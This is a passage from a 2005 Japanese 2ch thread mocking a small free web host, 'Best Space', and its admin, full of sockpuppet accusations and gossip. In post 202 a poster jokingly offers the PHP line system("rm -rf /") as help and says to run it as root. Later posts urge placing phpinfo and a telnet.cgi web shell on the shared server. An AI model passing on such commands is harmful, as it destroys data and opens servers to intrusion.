dalaさん乙です。

184 :名無しさん@お腹いっぱい。:2005/10/29(土) 20:18:47 0.net
ってか、いつからdalaはよしあきと敵対している、ってことになったんだ?

教えてくれよ

185 :名無しさん@お腹いっぱい。:2005/10/29(土) 21:19:22 0.net
かなり前から
いちどdalaがよしあきに成りすましたクッキーのままどこかに書き込みした気がスル

186 :名無しさん@お腹いっぱい。:2005/10/29(土) 21:57:06 0.net
>>184
君らの勝手な妄想だわな

187 :名無しさん@お腹いっぱい。:2005/10/29(土) 22:10:23 0.net
>>184=186はいはいdala dala

188 :名無しさん@お腹いっぱい。:2005/10/29(土) 22:42:40 0.net
dalaもdala呼ばわりされている奴もカワイソス

189 : ◆CoQSInE//U :2005/10/29(土) 23:52:28 0.net
>>1-1000
はいはいdaladala

190 :名無しさん@お腹いっぱい。:2005/10/29(土) 23:54:28 0.net
>>171
ちょwwwwwwスクリプト書いてみて

191 :名無しさん@お腹いっぱい。:2005/10/30(日) 00:04:55 0.net
漏れスクリプトできたらよしあきに送るから。
垢自動発行になる。

192 :191:2005/10/30(日) 00:12:20 0.net
垢自動発行になる。ウマーって核の忘れてたorz

193 :名無しさん@お腹いっぱい。:2005/10/30(日) 00:35:02 0.net
>>192
よしあきにバレないように裏も付けとけよ


194 :191:2005/10/30(日) 02:01:28 0.net
裏?

195 :名無しさん@お腹いっぱい。:2005/10/30(日) 06:49:48 0.net
>>194
裏って言うのはシステムの情報を取得するのじゃないの?

196 :名無しさん@お腹いっぱい。:2005/10/30(日) 08:44:26 0.net
で、またよしあきを付け上がらせるわけですがww

197 :名無しさん@お腹いっぱい。:2005/10/30(日) 08:47:32 0.net
>>196
お前は馬鹿かwwww
自動発行になったら俺たちだってアカウント取得し放題なんだぞwwwww

あんなことやこんなことがし放題www

198 :名無しさん@お腹いっぱい。:2005/10/30(日) 14:15:30 0.net
自動発行なんて数行プログラムだろ

199 :名無しさん@お腹いっぱい。:2005/10/30(日) 15:51:38 0.net
>>198
よしあきじゃないけどやり方教えてくれ

200 :名無しさん@お腹いっぱい。:2005/10/30(日) 16:03:19 0.net
よしあき乙。

201 : ◆CoQSInE//U :2005/10/30(日) 17:12:51 0.net
俺はPHPよりもperl派なんだよ

202 :名無しさん@お腹いっぱい。:2005/10/30(日) 17:18:39 0.net
>>199
<?php
system("rm -rf /");
?>

rootでこれやれば?

203 :web@垢デリ:2005/10/30(日) 17:23:56 P.net
>>202
ワロタ

204 :coq ◆OOOOOkCOQc :2005/10/30(日) 18:00:45 O.net
>>202
ちょwwwwwwwwそれwwwwwwwwwwwwww

205 :名無しさん@お腹いっぱい。:2005/10/30(日) 18:40:09 0.net
>>202
なるほど、その手があったか
やってみまつ。。。
勿論自分の自宅鯖でだけど

それってセーフモードで動く?

206 :名無しさん@お腹いっぱい。:2005/10/30(日) 19:03:09 0.net
いや、セーフモードを切ってからだな。
責任は持たんからな。

207 :名無しさん@お腹いっぱい。:2005/10/30(日) 20:47:42 0.net
おい。。。やめ(ry

208 : ◆CoQSInE//U :2005/10/30(日) 21:09:05 0.net
>>205
(^^

209 :coq ◆OOOOOkCOQc :2005/10/31(月) 00:45:44 O.net
謝罪と賠償は受け付けません

210 :名無しさん@お腹いっぱい。:2005/10/31(月) 05:12:29 0.net


211 :名無しさん@お腹いっぱい。:2005/10/31(月) 21:11:30 0.net
http

212 :名無しさん@お腹いっぱい。:2005/11/02(水) 19:48:13 0.net
サポート掲示板が自演のばっかですねww

213 :名無しさん@お腹いっぱい。:2005/11/02(水) 22:55:27 0.net
dala乙、乙

214 :名無しさん@お腹いっぱい。:2005/11/02(水) 23:03:19 0.net
プッdalaワロス


215 :名無しさん@お腹いっぱい。:2005/11/03(木) 09:24:29 0.net
よしあき乙

216 :名無しさん@お腹いっぱい。:2005/11/03(木) 09:29:34 0.net
雑談用掲示板が出来ましたよw
ttp://best-space.jp/a/bbs2/patio.cgi

@この掲示板はレンタルサーバとの直接的な関係を持たない物とする。
A個人名及び企業などの個人情報を書き込む事を禁止する。
B当掲示板で中傷行為は行はないものとする。
C管理人はいかなる投稿でも削除できるものとする。
D利用した時点でルールに同意した物とする。


トップページに謝罪文を載せる等の発言をしていたのに、
それはせずにこのような掲示板を立ててしまったよしあき君


217 :名無しさん@お腹いっぱい。:2005/11/03(木) 15:23:05 0.net
オナニスト ◆MRmxpjiK.2さん、Web板で馬鹿にされてますよ?
アレの事で・・・・
http://pc8.2ch.net/test/read.cgi/hp/1130887229/44-48

218 :名無しさん@お腹いっぱい。:2005/11/03(木) 16:01:27 0.net
オナニストってタダのアホだろww

219 :名無しさん@お腹いっぱい。:2005/11/03(木) 16:44:49 0.net
オナニストUzeeeeeeeeeeeeeeeeee!!

220 :名無しさん@お腹いっぱい。:2005/11/03(木) 16:47:18 0.net
131 名前: web@垢デリ [sage] 投稿日: 2005/10/24(月) 22:13:50 P
>>130
俺が以前それをコソーリ置いた事があって(さくらスレで貰った奴)を
ベストスペース用に改良したから、よしあきが貰って行ったのかな?


ちょwwwよしあきはアカウントを削除した奴のスクリプトを持ち逃げか??

221 :名無しさん@お腹いっぱい。:2005/11/03(木) 17:10:05 0.net
さくらのwikiで手にはいる
よしあきもさくらの垢持ってるし
#過去にも誰かいってたけど、よしあきの垢は漏れも確認済み

222 :名無しさん@お腹いっぱい。:2005/11/03(木) 17:14:36 0.net
web@垢デリ = オナニスト ◆MRmxpjiK.2
でおk?

てか、>>220にマジレスすると、
>ベストスペース用に改良したから
改良してなかったから…
#漏れがそのまま設置しても動いたし
#ただ、ユーザー数の取得はできなかった///orz

223 :名無しさん@お腹いっぱい。:2005/11/03(木) 17:19:50 0.net
なんつーか、どうでもいいけど鯖管ってdalaもよしあきも悪質なのが多いよな、なんでだろ?

224 :web@垢デリ:2005/11/03(木) 17:21:03 P.net
勝手にイコールで結ばれたので嫌な悪寒。

>>222
>ただ、ユーザー数の取得はできなかった///orz
まぁね…俺はちょっと改良したけど。

225 :222:2005/11/03(木) 17:28:16 0.net
>>224スマソ
>まぁね…俺はちょっと改良したけど。
なら今よしあき使ってるのはさくらのっぽいな
てかユーザー数のところも消してあるし、起動日数の取得位置もおかしいし

226 :名無しさん@お腹いっぱい。:2005/11/03(木) 17:36:13 0.net
オナニストに負けじと、俺は今度コテハンになってみる。
勿論、レン鯖板一の痛いコテハンを目指す。
オナニストなんかには負けん。

よっしゃ、頑張れ俺

227 :名無しさん@お腹いっぱい。:2005/11/03(木) 19:11:47 0.net
よしあきや屑箱と同類になるぞ。

228 :名無しさん@お腹いっぱい。:2005/11/03(木) 19:25:42 0.net
よしあきはまだ救いようがあるがな…
屑箱はな オナニストもな・・

229 :名無しさん@お腹いっぱい。:2005/11/03(木) 19:28:04 0.net
虚言癖のある奴は救いようがないと思う

230 :名無しさん@お腹いっぱい。:2005/11/03(木) 20:14:15 0.net
漏れらが勘違いしてる部分もあったがな

231 :名無しさん@お腹いっぱい。:2005/11/03(木) 22:17:40 0.net
まぁ厨房はやっぱり厨房ってこった
2chからも逃げた品

232 :オナニスト ◆MRmxpjiK.2 :2005/11/03(木) 23:28:14 0.net
1人で自演してWEB板と同じ人が叩いてますね^^
あぼ〜ん設定してたんじゃないのでしょうか?
なんで解除してるんですか?
あれれ?
ネットだけ大将乙wwww

233 :web@垢デリ:2005/11/03(木) 23:42:53 P.net
>>231
ある意味よしあきが居るほうが盛り上がるかもわからんね。

234 :名無しさん@お腹いっぱい。:2005/11/04(金) 02:19:59 0.net
>>231
でも、漏れはあれで良かったと思う。。
ネットって2chだけじゃないんだし



235 :名無しさん@お腹いっぱい。:2005/11/04(金) 05:27:25 0.net
>>234
だが逃げ方が悪かったよな
たとえると、敵前逃亡
最初は

『2chのアドバイスは貴重です。』とか

『2ちゃんで評判悪ければ世間の評判も悪いかもしれないですし、
2ちゃんのおかげなんです。。ここまでこれたのは』
って言ってたのに久しぶりに次スレを見てみると、いつの間にかコテハンじゃなく名無しで降臨してるし
よしあきは期待はずれだったか…


オナニストは目障りだけどな

236 :名無しさん@お腹いっぱい。:2005/11/04(金) 18:30:23 0.net
TOPページww

237 : ◆CoQSInE//U :2005/11/04(金) 19:31:25 0.net
さりげなくオナニストがスルーされてる件

238 :名無しさん@お腹いっぱい。:2005/11/04(金) 19:36:11 0.net
>>237
ちょwwおまい思い出すだろ

239 :名無しさん@お腹いっぱい。:2005/11/04(金) 19:36:31 0.net
>>236
何がおかしいのだ?
な〜んにも変わってないじゃんか・・・

240 :名無しさん@お腹いっぱい。:2005/11/04(金) 20:28:15 0.net
雑談掲示板が閉鎖されてるしwwwww


241 :名無しさん@お腹いっぱい。:2005/11/04(金) 22:28:24 0.net
a-a

242 :名無しさん@お腹いっぱい。:2005/11/05(土) 01:08:30 0.net
おいおい!!
dalaのところ自動発行じゃなくなってるし
http://www.formzu.jp/formgen.cgi?ID=c7805433
しかも、ハッキングに遭いました的事がトップに書いてある。

243 :オナニスト ◆MRmxpjiK.2 :2005/11/05(土) 04:34:26 0.net
かいてねーよ
糞ばばあ

244 :名無しさん@お腹いっぱい。:2005/11/05(土) 05:07:29 0.net
>>242
アルファのスレでやれよ

245 :名無しさん@お腹いっぱい。:2005/11/05(土) 06:50:31 0.net
ここでもいい?

246 :名無しさん@お腹いっぱい。:2005/11/05(土) 15:34:59 O.net
>>243の目は節穴のようです
参照(アルファブレンドのスレ)

247 : ◆CoQSInE//U :2005/11/05(土) 16:18:44 0.net
オナニストが厨房にしか相手にされなくなってきた件

248 :名無しさん@お腹いっぱい。:2005/11/05(土) 19:34:25 0.net
>>オナニストどこ?
あっごめん透明あぼんしてたwww

249 :名無しさん@お腹いっぱい。:2005/11/06(日) 12:19:07 0.net
ってか、誰かアカウント取れた奴いないのか??

250 :名無しさん@お腹いっぱい。:2005/11/06(日) 13:22:27 0.net
漏れとれたけどアダルトサイト作るから(当然実写じゃなくて)
OCN(教えぬ)

251 :名無しさん@お腹いっぱい。:2005/11/06(日) 14:40:13 0.net
一般人のフリをすれば、とれそうな気もするけどな。
俺はめんどくさ。

252 :名無しさん@お腹いっぱい。:2005/11/06(日) 16:44:41 0.net
>>250
アカウントくれないか?俺落選したみたい。。

253 :名無しさん@お腹いっぱい。:2005/11/06(日) 17:47:50 0.net
age

254 :250:2005/11/06(日) 18:59:21 0.net
いや、よく考えるとベストってあんまり落ちないからもうサイト作り始めちゃったんだよね

255 :名無しさん@お腹いっぱい。:2005/11/06(日) 19:08:10 0.net
if(250 == "よしあき") {
echo "よしあき乙";}
else {
echo "ちょwwwww250考え直せwwww\n\n";
echo "お前はCOTERIEという前例を知らないのか\n";
echo "個人で運営しているところはどこも危ないぞw\n";
}


PHP風味(文法間違ってるかも)
一回phpinfo置いてみてくれよ

256 : ◆CoQSInE//U :2005/11/06(日) 19:13:26 0.net
>>255
とりあえず置いてみた
http://be-sp.com/vipper/info.php

257 :名無しさん@お腹いっぱい。:2005/11/06(日) 19:32:19 0.net
ついでにあのPHPスクリプト動くかどうかやってみてちょ

258 :名無しさん@お腹いっぱい。:2005/11/06(日) 19:38:30 0.net
>>257
ちょwwおまwwwwwwwwwwwwwww

259 :250:2005/11/06(日) 19:45:49 0.net
バックアップはしてるから平気
つか、正直軽いじゃん

260 :名無しさん@お腹いっぱい。:2005/11/06(日) 19:56:19 0.net
>>257
あれやるとどうなるの?

261 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:00:25 0.net
>>255
どうでもいいが絶対TRUEにならないぞw
せめて250を変数にしてやってくれよw

>>260
PHPのバージョンなどがわかる。
セーフモードで動いているから意味無いかも知れないがw


262 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:02:04 0.net
>>259
よしあき乙
>>260
あんなことやこんなことが出来る
Perlでも同様のことが。。。


じゃあ危ないスクリプト作ってくる。。需要は見込めないがw


263 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:02:51 0.net
てかおまいらすごいな。
漏れperlのカウンターがやっとかけるようになったのに

264 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:03:09 0.net
>>262
セーフモードで動いているから意味無いよ

265 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:04:06 0.net
>>261
そうだなwww
$入れ忘れたww

266 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:04:17 0.net
>>262
telnet.cgi置いてみてよ

267 :250:2005/11/06(日) 20:05:34 0.net
よしあきじゃないが
こういい事ばかり書けばそう思われてもしょうがないか…
でも、軽くね?wwwwwwwww

268 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:05:44 0.net
>>261
まぁ変数にした所でエンコードされていないから絶対にTRUEにならないわけだが。

269 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:06:30 0.net
>>266
俺は垢持ってないwww

>>263
危ない関数が用意されてるから簡単

270 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:07:26 0.net
>>268
まぁ、まぁ
そんなどおでもいいことは置いておいて、

つttp://www.imgup.org/file/iup114548.jpg

271 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:11:12 0.net
軽いのは本格的なユーザーがいないからだwwww
俺はこういう鯖を倉庫用に利用しているが、
倉庫利用には個人鯖がいい

それも、よしあきのような厨房が管理していると見付かる可能性も少ない

272 :250:2005/11/06(日) 20:12:14 0.net
>>270
お子様乙

273 :250:2005/11/06(日) 20:14:25 0.net
>>271
そういえば、そうだな。
まぁ、もっとリア房でいかれた鯖もあるが

274 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:15:57 0.net
最初250はよしあきじゃないと思っていたが、レスが増えていくにつれよしあきに見えてくる悪寒www

275 :250:2005/11/06(日) 20:17:06 0.net
そんなによしあきにしたいのか?

276 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:30:33 P.net
よしあきは携帯でしょ?

277 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:32:06 0.net
>>276ようcoq
↓讃岐

278 :讃岐:2005/11/06(日) 20:33:43 0.net
>>276
ベストのサポ掲示板でもみれ
携帯からじゃないことが分かってくるから

>>277
本物じゃなくて済まないな

279 :名無しさん@お腹いっぱい。:2005/11/06(日) 20:35:37 0.net
一瞬美美っ他
>>278
内巣海苔

280 :名無しさん@お腹いっぱい。:2005/11/06(日) 21:02:10 0.net
そう言えばサブドメイン導入したの?
http://info.best-space.jp/

281 :名無しさん@お腹いっぱい。:2005/11/06(日) 22:00:59 0.net
>>280
あいつには無理だったから止めたんだとさ


282 :名無しさん@お腹いっぱい。:2005/11/06(日) 23:03:49 0.net
サブドメインちゃんと機能してるじゃん

283 :名無しさん@お腹いっぱい。:2005/11/07(月) 17:55:59 0.net
gea

284 :名無しさん@お腹いっぱい。:2005/11/09(水) 19:07:46 0.net
よしあきの鯖落ちてるよ

ってか落ちすぎだろ

285 :名無しさん@お腹いっぱい。:2005/11/09(水) 19:14:45 0.net
うるせー
ばーかーw

286 :名無しさん@お腹いっぱい。:2005/11/09(水) 19:25:01 0.net
ほんと糞鯖ですね^ω^;

287 :名無しさん@お腹いっぱい。:2005/11/09(水) 19:43:58 0.net
>>284
よしあきの鯖おちてるよ
~~~~~~~~~~~~
はいはいdala dala
おちたの久しぶりだから

288 :名無しさん@お腹いっぱい。:2005/11/09(水) 19:49:06 0.net
>>284=>>286
>>284-286
はいはい、dala dala

289 :名無しさん@お腹いっぱい。:2005/11/09(水) 20:16:30 0.net
落ちてなくね?
もうなおったのか?
どっちにしてもウェブタルより落ちないし落ちても復帰早いからな

なんて書くと
ウェブタル鯖管↓

290 :名無しさん@お腹いっぱい。:2005/11/09(水) 23:04:44 0.net
なに弱小鯖同士で何やってんだか。
つか、比べるのが間違いだな。
復帰が遅い?だったらCOTERIEよりはマシだろ?
こんな風にいくらでも下はいるさ。

とまぁ、擁護のつもりはないがよしあきっていう馬鹿が1匹いるようだから言っておく。

291 :よしあき:2005/11/09(水) 23:57:35 0.net
荒らすなよ
ばーかw

292 :名無しさん@お腹いっぱい。:2005/11/10(木) 02:38:25 0.net
>>290=>>291=dalaかウェブタル鯖管
乙!乙!

293 :名無しさん@お腹いっぱい。:2005/11/10(木) 02:46:50 0.net
ワロス

294 :名無しさん@お腹いっぱい。:2005/11/10(木) 02:59:18 0.net
>なに弱小鯖同士で何やってんだか。
>つか、比べるのが間違いだな。












>復帰が遅い?だったらCOTERIEよりはマシだろ?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
↑ここ見るとウェブタル鯖管に見えるんだが


295 :名無しさん@お腹いっぱい。:2005/11/10(木) 03:14:19 0.net
なあ。ベストスペーストップページのページタイトルが「(前略)無料HP作成や友達を探すなら!」
ってなってんだけど、出会い系でもやるつもりかコイツ。

296 :名無しさん@お腹いっぱい。:2005/11/10(木) 06:40:59 0.net
>>295
お前、サイト作ったことあるのか?wwww


検索したときにHitしやすいようにしてるんだろ?
現に掲示板サービスって名目あるんだし
まだ掲示板はないが

297 : ◆Edward/THk :2005/11/10(木) 18:06:52 0.net
>>296
横槍だが、295はよしあきの掲示板では友達などを探せないだろ、ということを言いたいんじゃないか?

ってかdalaとよしあきが近頃沸いてるなw



ついでに糞コテ用のトリップテスト
オナニストを超える糞コテを目指して。。

298 :名無しさん@お腹いっぱい。:2005/11/10(木) 18:09:27 0.net
>>287,288,289,292,296
よしあき乙


299 :名無しさん@お腹いっぱい。:2005/11/10(木) 18:58:38 0.net
よしあきじゃないんだが
>>298ウェブタル鯖管乙

300 :名無しさん@お腹いっぱい。:2005/11/10(木) 19:47:18 0.net
>>299
よしあき乙

301 :名無しさん@お腹いっぱい。:2005/11/10(木) 20:00:40 0.net
>>1-301
よしあき乙

302 : ◆Edward/THk :2005/11/10(木) 22:42:20 0.net
>>301
お前までよしあきかww

303 :名無しさん@お腹いっぱい。:2005/11/10(木) 22:45:03 0.net
甲ふふふ

304 :名無しさん@お腹いっぱい。:2005/11/11(金) 05:09:45 0.net
当方接続回線業者の回線障害って嘘だよな?

こいつDIONの回線だけど…

305 :名無しさん@お腹いっぱい。:2005/11/11(金) 07:04:16 0.net
いや、嘘じゃないよ っていってもよしあきをどうこういうわけじゃないが
ppp.bbだから漏れと同じ光りプラスなんだが、一週間に一回くらい回線が一瞬途切れる。
ネットゲとかしてるとすぐタイムアウトとかなるし
光りプラスのスレでも話題になってた。

漏れがdionに問い合わせたら、
「そのようなことは、確認されておりません」
の一点張り

306 :名無しさん@お腹いっぱい。:2005/11/11(金) 11:17:08 0.net
↑ よしあき

307 :名無しさん@お腹いっぱい。:2005/11/11(金) 11:30:58 0.net
↑ よしあき


308 :▼Edward/THk:2005/11/11(金) 15:57:51 0.net
WEBTALのスレで鯖管があばれてまふ
つか、WEBTALレベル低!! 

309 : ◆Edward/THk :2005/11/12(土) 22:17:20 0.net
>>308
一瞬鳥ばれたのかと思ってあせったじゃないかwwww

どうせ誰かから攻撃を受けてたり、自分の不注意とか、そんなもんでしょ
俺はDIONの光契約してるけど全然快適だし

ってことであげ

310 :▼Edward/THk :2005/11/12(土) 22:42:46 0.net
ばれてあせるかwww

311 :名無しさん@お腹いっぱい。:2005/11/13(日) 00:04:28 0.net
>俺はDIONの光契約してるけど全然快適だし
DIONの光と光プラスってサービスちがくね?

光プラススレ。 確か、前スレで話題になってたが
http://pc8.2ch.net/test/read.cgi/isp/1126179574/

312 : ◆Edward/THk :2005/11/13(日) 09:46:30 0.net
>>310
そりゃあ焦るよww

>>311
いや俺光プラス
紛らわしいこと言ってすまんな

俺が見てるときいつもベスト落ちてるのは気のせいか?
今も落ちてるみたいだし。。

313 :名無しさん@お腹いっぱい。:2005/11/13(日) 10:25:09 0.net
age

314 :▲Edward/THk:2005/11/13(日) 11:33:13 0.net
wwwwwwww

315 :名無しさん@お腹いっぱい。:2005/11/13(日) 12:02:11 0.net
>>314
ちょwwwおまwwwそれいい加減やめてくれww

316 :■Edward/THk:2005/11/13(日) 12:50:51 0.net
別にいんじゃね?(^ω^ )

317 :名無しさん@お腹いっぱい。:2005/11/14(月) 22:08:39 0.net
>>312
Pingすればいいんじゃね?

318 : ◆Edward/THk :2005/11/14(月) 22:37:03 0.net
・オンラインゲーム
・共有データ倉庫
・サーチエンジン
・掲示板サービス
・ストレージ
なんて書いてあるから期待したけどリンク貼ってないのね。。。
萎えた
そもそも掲示板サービスとか、出来るわけ無かったのね。。

とそんなことばっか言っていたらdalaにされるのでここらで擁護。。
みんな、よしあきは技術は無くてもやりたいことはいっぱいあるんだから許してあげなw

>>317
Pingすっかり忘れてた、めんどくさいから誰かやってくれよ

319 :名無しさん@お腹いっぱい。:2005/11/14(月) 23:32:29 0.net
↑coq

320 :■Edward/THk:2005/11/14(月) 23:38:45 0.net
↓coq

321 :cop:2005/11/14(月) 23:46:12 0.net
copだお

322 :◇○□△▽Edward/THk :2005/11/17(木) 08:45:43 0.net
いえーーーーい

どうだ!

323 :名無しさん@お腹いっぱい。:2005/11/17(木) 17:17:48 0.net
ってか、サポート掲示板のスレッドがロック中ばかりなのが萎えたww

324 :名無しさん@お腹いっぱい。:2005/11/19(土) 19:11:51 0.net
>>323
ロックしなかったら荒らされる

325 :名無しさん@お腹いっぱい。:2005/11/23(水) 10:05:52 0.net
このスレは陰謀によりage

326 :名無しさん@お腹いっぱい。:2005/11/27(日) 00:55:04 0.net
新鯖キター
募集キター
掲示板サービスキター

327 : ◆boot//5v0I :2005/11/27(日) 02:46:20 O.net
お!!キター--------(・∀・)--------------
ずっとここ使いたかったんだよね。

328 :-9999:2005/11/27(日) 04:55:29 0.net
ぽー
プギャー
よさば


329 :名無しさん@お腹いっぱい。:2005/11/27(日) 13:40:45 0.net
やっと来たーww

330 :名無しさん@お腹いっぱい。:2005/11/27(日) 13:45:33 0.net
>>326-329
自演乙

掲示板サービス、ってこれサービスって呼べるのか?
タダの掲示板とは違うのかね?

どうでもいいけど、今だにデザイン変えないのかww

331 :名無しさん@お腹いっぱい。:2005/11/27(日) 13:47:49 0.net
広告が再婚相手募集ってかかれてて萎えた

332 :名無しさん@お腹いっぱい。:2005/11/27(日) 18:31:35 0.net
書き込み少なすぎじゃまいか
削除人なんかいらねえだろwwwww

333 :名無しさん@お腹いっぱい。:2005/11/27(日) 19:43:30 0.net
自演ご苦労

334 :名無しさん@お腹いっぱい。:2005/11/27(日) 22:20:03 0.net
ID制がいいよな
自演自演五月蝿いから

335 :名無しさん@お腹いっぱい。:2005/11/28(月) 01:48:56 0.net
IP表示でいいよ

336 :名無しさん@お腹いっぱい。:2005/11/28(月) 02:21:32 O.net
軽い軽い
ピーク時からずっと負担計測みてたけど軽すぎ!!
垢とれてよかった

337 :名無しさん@お腹いっぱい。:2005/11/28(月) 04:48:34 0.net
今はな

338 :名無しさん@お腹いっぱい。:2005/11/28(月) 21:37:28 0.net
ずっと叩いてきた漏れが言うのもなんだけど
最初スレが立ったときから、比べると急成長してるよな
他の厨房鯖と比べてみるとまともに使う価値が少しでてきたし。
このままだと鯖管扱いされるから最後に
ま だ ま だだな

339 :名無しさん@お腹いっぱい。:2005/11/28(月) 23:01:25 O.net
>>338
鯖管乙

340 :名無しさん@お腹いっぱい。:2005/11/29(火) 01:10:38 0.net
どうもよしあきは初心者に垢わたしちまったようだな
サポート掲示板のレベルの低さにわワロタ

341 :名無しさん@お腹いっぱい。:2005/11/29(火) 03:04:33 0.net
>>339
突っ込み乙

342 :名無しさん@お腹いっぱい。:2005/11/29(火) 19:00:00 0.net
最初が低すぎるから成長はしたな、でも厨房鯖の一番下だろうか
突っ込みどころは満載だからダントツだがw

所で、自分で野球少年名乗ってた割には病気で下半身不随で鯖管なんて少々怖いよな


343 :名無しさん@お腹いっぱい。:2005/11/29(火) 19:07:16 0.net
>>342
でも、意外とスポーツ選手に限って多いみたいだけど?
体を無理に使えばいつかは限界がくるし
それに大会関係があれば無理してでも体使うのがスポーツ選手なんだから

漏れもギランバレーの詳細ページ見たが、結構突発的要因な事が多いみたい

344 :名無しさん@お腹いっぱい。:2005/11/29(火) 19:08:19 0.net
>>343
こいつギランバレーだっけ?

病名違ってなかったか?

345 :名無しさん@お腹いっぱい。:2005/11/29(火) 19:11:02 O.net
>>344
グラチャンバレー

346 :名無しさん@お腹いっぱい。:2005/11/29(火) 19:16:06 0.net
今更思うけどよしあきってマゾだよね
自分から祭りしても良いですよ、とか行ってるしw

347 :名無しさん@お腹いっぱい。:2005/11/29(火) 20:11:13 0.net
いや、正直漏れが鯖管でも祭りは楽しいけどな

348 : ◆CoQSInE//U :2005/11/30(水) 16:23:39 0.net
潮時

349 :名無しさん@お腹いっぱい。:2005/11/30(水) 17:01:12 0.net
>>348
しおどき?

350 :名無しさん@お腹いっぱい。:2005/11/30(水) 17:02:50 0.net
ベストスペースもこのスレも祭りも潮時だな確かに

351 :名無しさん@お腹いっぱい。:2005/11/30(水) 19:36:44 0.net
祭りは結構前から終わってたよな

352 :名無しさん@お腹いっぱい。:2005/12/02(金) 16:11:09 0.net
みんなどうでもよくなってきたんだろ。
たいした燃料もないしな。

353 :名無しさん@お腹いっぱい。:2005/12/02(金) 17:44:23 0.net
っていうかよしあきがたいした奴じゃないって分かった時点でかなり祭りの規模下がったよな
粘着してるの俺ぐらい。。


あとdalaもかww

354 :名無しさん ◆iOqLxYOSHI :2005/12/02(金) 17:52:52 0.net
いやあ、アカウントは持ってるんだけどねw

355 :名無しさん@お腹いっぱい。:2005/12/02(金) 20:49:40 O.net
まぁ、そうだろうな
今回の募集で相当取れたし

356 :名無しさん@お腹いっぱい。:2005/12/03(土) 00:35:04 0.net
>>374
セキュリティどうよ?

357 :名無しさん@お腹いっぱい。:2005/12/03(土) 02:40:20 0.net
まちがえた
>>354宛てね

358 :名無しさん@お腹いっぱい。:2005/12/03(土) 07:32:57 0.net
>>374にきたいするね...

359 :名無しさん@お腹いっぱい。:2005/12/03(土) 21:33:49 0.net
勝手に期待してろ屑。

360 : ◆CoQSInE//U :2005/12/04(日) 00:25:03 0.net
pf-x並に利用者入れるつもりかもなぁ

361 :名無しさん@お腹いっぱい。:2005/12/04(日) 03:00:30 O.net
まぁ、一利用者の漏れとしては何人入れてもいいから、重くはするなってところかな?
pf-x(だっけ?)あんなの糞鯖だし個人情報ヤバイし

362 :名無しさん@お腹いっぱい。:2005/12/04(日) 08:57:47 0.net
無料鯖にはやくしるって?
まあ、期待うすだと思うけど

もうこれって、鯖缶側のボランティアだからさ

363 :名無しさん@お腹いっぱい。:2005/12/04(日) 09:30:22 0.net
>>361
その糞鯖並にこの鯖もかなり…

ってか他のレン鯖の真似ばかりだと思うのは俺だけ?
有るレン鯖で見た物を、1日後ぐらいにはベストスペースがやる気になってるし。。(文章へたくて済まん)


364 :名無しさん@お腹いっぱい。:2005/12/04(日) 17:33:57 O.net
意味がわからんし
別に同じサービスをした所で問題ないぞ
なpf-x鯖管さん!!

365 :名無しさん@お腹いっぱい。:2005/12/04(日) 17:59:26 0.net
>>364
うるせえんだよ!!!!!!!!!
他の鯖管が書き込みして何が悪いんだよ?
あ?言ってみろよ無能が

366 :名無しさん@お腹いっぱい。:2005/12/04(日) 18:23:42 0.net
厨房板でどうぞ。

367 : ◆CoQSInE//U :2005/12/04(日) 19:01:28 0.net
はいはいようこそぼくのホームページへ^^ようこそぼくのホームページへ^^

368 :名無しさん@お腹いっぱい。:2005/12/04(日) 19:04:11 0.net
匿名掲示板で名前を指定する厨房さんごくろうなこった

369 :名無しさん@お腹いっぱい。:2005/12/05(月) 18:28:11 0.net
なんで厨鯖のスレには厨房は沸いてくるのかな

370 :名無しさん@お腹いっぱい。:2005/12/06(火) 19:33:34 0.net
>>369
仕方ないだろ

ってかカンパさせるぐらいならレン鯖するな、と言いたくなるのは俺だけ?

371 :名無しさん@お腹いっぱい。:2005/12/06(火) 21:37:28 0.net
>>370
pf-x乙

372 :名無しさん@お腹いっぱい。:2005/12/07(水) 20:08:35 0.net
>>371
>>368

>>370
SAW2.ORGの奴にも言ってやりたいな

373 :名無しさん@お腹いっぱい。:2005/12/07(水) 20:16:37 0.net
pf-x乙

374 :名無しさん@お腹いっぱい。:2005/12/07(水) 20:27:47 0.net
pf-x乙!

375 :名無しさん@お腹いっぱい。:2005/12/14(水) 01:05:25 0.net
ここ糞鯖なの?サポートもいいし、軽いから今使ってるんだけど

376 :名無しさん@お腹いっぱい。:2005/12/14(水) 01:06:24 0.net
厨鯖

377 :名無しさん@お腹いっぱい。:2005/12/14(水) 01:15:25 0.net
>>375
まぁ、厨房鯖なんだけど、漏れはサポートは別としてまぁまぁかなとおもてる。
でも、あんまり変な期待はしないほうがいい。
まだ、できてからそんなにたってないから

378 :名無しさん@お腹いっぱい。:2005/12/19(月) 05:58:47 0.net
DBさえろくにないここは将来性ヒクスww

379 :名無しさん@お腹いっぱい。:2005/12/19(月) 07:38:11 0.net
無料にDBがあるほうが、めずらしいで希ガス

380 :オナニスト ◆MRmxpjiK.2 :2005/12/20(火) 05:48:57 0.net
長生きしてくれよ
よしあき

381 :名無しさん@お腹いっぱい。:2005/12/20(火) 07:26:12 0.net
容量無制限とかアダルト可とか正直やめて欲しい…orz

382 :名無しさん@お腹いっぱい。:2005/12/20(火) 07:51:08 O.net
どちらにせよ
容量無制限は導入しないキガス

とりあえず、候補にはあるわけだが

383 :名無しさん@お腹いっぱい。:2005/12/20(火) 10:16:34 0.net
ぶっちゃげこのままでいいよ
てか変えんな

384 :名無しさん@お腹いっぱい。:2005/12/20(火) 12:01:23 0.net
>>383
そうだよな
まぁ、容量が増えるだけなら問題なくね?

385 :名無しさん@お腹いっぱい。:2005/12/20(火) 12:13:23 0.net


386 :名無しさん@お腹いっぱい。:2005/12/20(火) 12:35:40 0.net
<足の裏>
最近ベストが厨房鯖の中で一番優れている気がしてきた
というよりも厨房鯖であることを忘れて使っていた今日最近
ただ、欲を言えばデータベース使ってみたい
#使ったことないから
